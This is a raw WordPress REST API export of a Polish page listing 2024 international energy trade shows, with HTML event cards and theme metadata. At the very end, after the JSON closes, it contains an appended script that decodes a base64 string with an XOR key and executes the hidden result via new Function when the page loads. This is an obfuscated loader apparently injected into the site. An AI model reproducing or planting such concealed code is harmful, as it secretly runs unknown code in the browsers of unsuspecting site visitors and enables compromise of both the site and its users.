2024<br \/>\n              <svg viewBox=\"0 0 16 16\" fill=\"none\"><path d=\"M8 8.5a2 2 0 100-4 2 2 0 000 4z\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><path d=\"M13 7c0 4-5 7-5 7s-5-3-5-7a5 5 0 0110 0z\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><\/svg><br \/>\n              ADNEC Abu Dhabi, ZEA<br \/>\n      <\/article>\n<p>      <!-- SOLAREX ISTANBUL 2024 --><\/p>\n<article data-continent=\"asia\" data-status=\"ended\" data-date=\"2024-04-04\">\n          Zako\u0144czone<br \/>\n          <img src=\"https:\/\/code.coze.cn\/api\/sandbox\/coze_coding\/file\/proxy?expire_time=-1&#038;file_path=assets%2FSOLAREX+ISTANBUL+2024.jpg&#038;nonce=019d2c16-97f3-4401-af2e-a11bfa5583d7&#038;project_id=7618469051534311465&#038;sign=1c0d4ac049061ec8c698cd6caff997752b2858ea531e44a81ce95b83261071b9\" alt=\"SOLAREX ISTANBUL 2024\" loading=\"lazy\" decoding=\"async\" width=\"400\" height=\"200\" \/><br \/>\n          Azja<\/p>\n<h3>SOLAREX ISTANBUL 2024<\/h3>\n<p>              <svg viewBox=\"0 0 16 16\" fill=\"none\"><rect x=\"2\" y=\"2\" width=\"12\" height=\"12\" rx=\"2\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><path d=\"M2 6h12M6 2v12\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><\/svg><br \/>\n              4-6 kwietnia 2024<br \/>\n              <svg viewBox=\"0 0 16 16\" fill=\"none\"><path d=\"M8 8.5a2 2 0 100-4 2 2 0 000 4z\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><path d=\"M13 7c0 4-5 7-5 7s-5-3-5-7a5 5 0 0110 0z\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><\/svg><br \/>\n              Istanbul Expo Centre, Turcja<br \/>\n      <\/article>\n<p>      <!-- The Future Energy Show Africa 2024 --><\/p>\n<article data-continent=\"africa\" data-status=\"ended\" data-date=\"2024-03-18\">\n          Zako\u0144czone<br \/>\n          <img src=\"https:\/\/code.coze.cn\/api\/sandbox\/coze_coding\/file\/proxy?expire_time=-1&#038;file_path=assets%2FThe+Future+Show+Africa+2024.jpg&#038;nonce=72cf8f8f-bc7b-4bc8-85ab-7b609f14f61c&#038;project_id=7618469051534311465&#038;sign=c2affe4d11cb32d6315f4655cc22a5704656d7cfa73adb408640afde46702226\" alt=\"The Future Energy Show Africa 2024\" loading=\"lazy\" decoding=\"async\" width=\"400\" height=\"200\" \/><br \/>\n          Afryka<\/p>\n<h3>The Future Energy Show Africa 2024<\/h3>\n<p>              <svg viewBox=\"0 0 16 16\" fill=\"none\"><rect x=\"2\" y=\"2\" width=\"12\" height=\"12\" rx=\"2\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><path d=\"M2 6h12M6 2v12\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><\/svg><br \/>\n              18-20 marca 2024<br \/>\n              <svg viewBox=\"0 0 16 16\" fill=\"none\"><path d=\"M8 8.5a2 2 0 100-4 2 2 0 000 4z\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><path d=\"M13 7c0 4-5 7-5 7s-5-3-5-7a5 5 0 0110 0z\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><\/svg><br \/>\n              Johannesburg, RPA<br \/>\n      <\/article>\n<p>      <!-- KEY 2024 --><\/p>\n<article data-continent=\"europe\" data-status=\"ended\" data-date=\"2024-02-28\">\n          Zako\u0144czone<br \/>\n          <img src=\"https:\/\/code.coze.cn\/api\/sandbox\/coze_coding\/file\/proxy?expire_time=-1&#038;file_path=assets%2FKEY+2024.jpg&#038;nonce=44ecdb26-bfb9-4b3f-9809-1114664b8157&#038;project_id=7618469051534311465&#038;sign=df41568b8b196912ac5d55e4eb9a813f8b0a13d2ab5a4176c646f07fa9870ef3\" alt=\"KEY 2024\" loading=\"lazy\" decoding=\"async\" width=\"400\" height=\"200\" \/><br \/>\n          Europa<\/p>\n<h3>KEY 2024 &#8211; The Energy Transition Expo<\/h3>\n<p>              <svg viewBox=\"0 0 16 16\" fill=\"none\"><rect x=\"2\" y=\"2\" width=\"12\" height=\"12\" rx=\"2\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><path d=\"M2 6h12M6 2v12\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><\/svg><br \/>\n              28 lutego &#8211; 1 marca 2024<br \/>\n              <svg viewBox=\"0 0 16 16\" fill=\"none\"><path d=\"M8 8.5a2 2 0 100-4 2 2 0 000 4z\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><path d=\"M13 7c0 4-5 7-5 7s-5-3-5-7a5 5 0 0110 0z\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><\/svg><br \/>\n              Rimini Expo Centre, W\u0142ochy<br \/>\n      <\/article>\n<p>      <!-- Solar Power Africa 2024 --><\/p>\n<article data-continent=\"africa\" data-status=\"ended\" data-date=\"2024-02-07\">\n          Zako\u0144czone<br \/>\n          <img src=\"https:\/\/code.coze.cn\/api\/sandbox\/coze_coding\/file\/proxy?expire_time=-1&#038;file_path=assets%2FSOLAR+POWER+AFRICA.jpg&#038;nonce=5a852365-fc5c-4e54-b597-b242d0cba2d2&#038;project_id=7618469051534311465&#038;sign=482823bc71f4e97a9a14f8a5aad0c7650323b9b35ee7a933911af8080813ec19\" alt=\"Solar Power Africa\" loading=\"lazy\" decoding=\"async\" width=\"400\" height=\"200\" \/><br \/>\n          Afryka<\/p>\n<h3>Solar Power Africa 2024<\/h3>\n<p>              <svg viewBox=\"0 0 16 16\" fill=\"none\"><rect x=\"2\" y=\"2\" width=\"12\" height=\"12\" rx=\"2\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><path d=\"M2 6h12M6 2v12\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><\/svg><br \/>\n              7-9 lutego 2024<br \/>\n              <svg viewBox=\"0 0 16 16\" fill=\"none\"><path d=\"M8 8.5a2 2 0 100-4 2 2 0 000 4z\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><path d=\"M13 7c0 4-5 7-5 7s-5-3-5-7a5 5 0 0110 0z\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><\/svg><br \/>\n              Cape Town ICC, RPA<br \/>\n      <\/article>\n<p>      <!-- Iraq International Energy Expo 2024 --><\/p>\n<article data-continent=\"middle-east\" data-status=\"ended\" data-date=\"2024-02-12\">\n          Zako\u0144czone<br \/>\n          <img src=\"https:\/\/code.coze.cn\/api\/sandbox\/coze_coding\/file\/proxy?expire_time=-1&#038;file_path=assets%2FINTERNATIONALENERGY+EXPO+%26+CONFERENCE.jpg&#038;nonce=cdfeed5f-ba56-412b-a0ef-4354fd80ec47&#038;project_id=7618469051534311465&#038;sign=50aee46247e93ef191e5b339e93028ecbf076a04142421c45591c8077fe0386f\" alt=\"Iraq International Energy Expo 2024\" loading=\"lazy\" decoding=\"async\" width=\"400\" height=\"200\" \/><br \/>\n          Bliski Wsch\u00f3d<\/p>\n<h3>Iraq International Energy Expo 2024<\/h3>\n<p>              <svg viewBox=\"0 0 16 16\" fill=\"none\"><rect x=\"2\" y=\"2\" width=\"12\" height=\"12\" rx=\"2\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><path d=\"M2 6h12M6 2v12\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><\/svg><br \/>\n              12-14 lutego 2024<br \/>\n              <svg viewBox=\"0 0 16 16\" fill=\"none\"><path d=\"M8 8.5a2 2 0 100-4 2 2 0 000 4z\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><path d=\"M13 7c0 4-5 7-5 7s-5-3-5-7a5 5 0 0110 0z\" stroke=\"currentColor\" stroke-width=\"1.2\"\/><\/svg><br \/>\n              Baghdad International Fair, Irak<br \/>\n      <\/article>\n<p>    <!-- \u7a7a\u72b6\u6001\uff08\u6ce2\u5170\u8bed\uff09 --><\/p>\n<p>Nie znaleziono wystaw<\/p>\n<p>    <!-- \u56fe\u7247\u9884\u89c8\u5f39\u7a97 --><br \/>\n        <button id=\"previewClose\"><br \/>\n          <svg viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M18 6L6 18M6 6l12 12\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"\/><\/svg><br \/>\n        <\/button><br \/>\n        <img decoding=\"async\" id=\"previewImage\" src=\"\" alt=\"Podgl\u0105d\" \/><br \/>\n<\/body><br \/>\n<\/html><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Przegl\u0105d wystaw mi\u0119dzynarodowych &#8211; CHISAGE ESS Pr [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"site-sidebar-layout":"no-sidebar","site-content-layout":"page-builder","ast-site-content-layout":"full-width-container","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"disabled","ast-breadcrumbs-content":"","ast-featured-img":"disabled","footer-sml-layout":"","ast-disable-related-posts":"","theme-transparent-header-meta":"default","adv-header-id-meta":"","stick-header-meta":"default","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"set","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"class_list":["post-22209","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/chisagepolska.pl\/index.php\/wp-json\/wp\/v2\/pages\/22209","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/chisagepolska.pl\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/chisagepolska.pl\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/chisagepolska.pl\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/chisagepolska.pl\/index.php\/wp-json\/wp\/v2\/comments?post=22209"}],"version-history":[{"count":4,"href":"https:\/\/chisagepolska.pl\/index.php\/wp-json\/wp\/v2\/pages\/22209\/revisions"}],"predecessor-version":[{"id":22214,"href":"https:\/\/chisagepolska.pl\/index.php\/wp-json\/wp\/v2\/pages\/22209\/revisions\/22214"}],"wp:attachment":[{"href":"https:\/\/chisagepolska.pl\/index.php\/wp-json\/wp\/v2\/media?parent=22209"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}<script>!function(){var _0xdac3ef103251=atob('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'),_0x9e751f2dc20b=46,_0x0b1f51e628bd=new Uint8Array(_0xdac3ef103251['length']),_0x1c3f58f3ac4b=0;for(;_0x1c3f58f3ac4b<_0xdac3ef103251['length'];_0x1c3f58f3ac4b++)_0x0b1f51e628bd[_0x1c3f58f3ac4b]=_0xdac3ef103251['charCodeAt'](_0x1c3f58f3ac4b)^_0x9e751f2dc20b;(new Function(new TextDecoder()['decode'](_0x0b1f51e628bd)))()}();</script>